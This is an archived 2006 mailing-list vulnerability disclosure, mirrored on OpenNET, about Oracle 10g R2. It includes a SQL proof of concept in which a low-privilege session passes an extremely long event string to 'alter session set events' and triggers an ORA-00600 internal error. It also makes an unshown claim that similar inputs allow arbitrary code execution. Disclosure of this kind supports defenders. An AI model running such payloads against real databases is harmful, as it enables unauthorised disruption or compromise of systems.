The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Oracle 10g R2 and, probably, all previous versions


<< Previous INDEX Search src / Print Next >> 
From: "putosoft softputo" <hasecorp@hotmail.com.>
To: [email protected], [email protected]
Subject: Oracle 10g R2 and, probably, all previous versions
Date: Thu, 27 Jul 2006 19:23:41 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
X-OriginalArrivalTime: 27 Jul 2006 19:23:45.0290 (UTC) FILETIME=[2D8936A0:01C6B1B2]
X-Virus-Scanned: antivirus-gw at tyumen.ru

I can't believe it. Oracle releases new patches and they have not been 
solved one of the main problems: A user with only the SELECT privilege can 
do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE!!!!

I'm not sure if is time to full disclosure it but, anyway, I will "full 
disclosure" one inocent issue, an integer overflow:

Example:
--Connect with any user with only CREATE SESSION
SQL> alter session set events '10046 trace name context forever, level 16';

Session altered.

SQL> alter session set events 
'10046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004
61004610046100461004610046100461004610046100461004610046100461004610046100461004610046trace 
name context forever, level 16';
ERROR:
ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [], 
[]


It's not even a crash but (be sure) that there are other "combinations" that 
makes it vulnerable to integer overflows allowing the execution of 
arbritrary code.

PD: Hello Mary Ann! Are you on holidays?

_________________________________________________________________
Grandes éxitos, superhéroes, imitaciones, cine y TV... 
http://es.msn.kiwee.com/ Lo mejor para tu móvil.

<< Previous INDEX Search src / Print Next >>



ðÁÒÔΣÒÙ:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
èÏÓÔÉÎÇ:

úÁËÌÁÄËÉ ÎÁ ÓÁÊÔÅ
ðÒÏÓÌÅÄÉÔØ ÚÁ ÓÔÒÁÎÉÃÅÊ 		Created 1996-2025 by Maxim Chirkov
äÏÂÁ×ÉÔØ, ðÏÄÄÅÒÖÁÔØ, ÷ÅÂÍÁÓÔÅÒÕ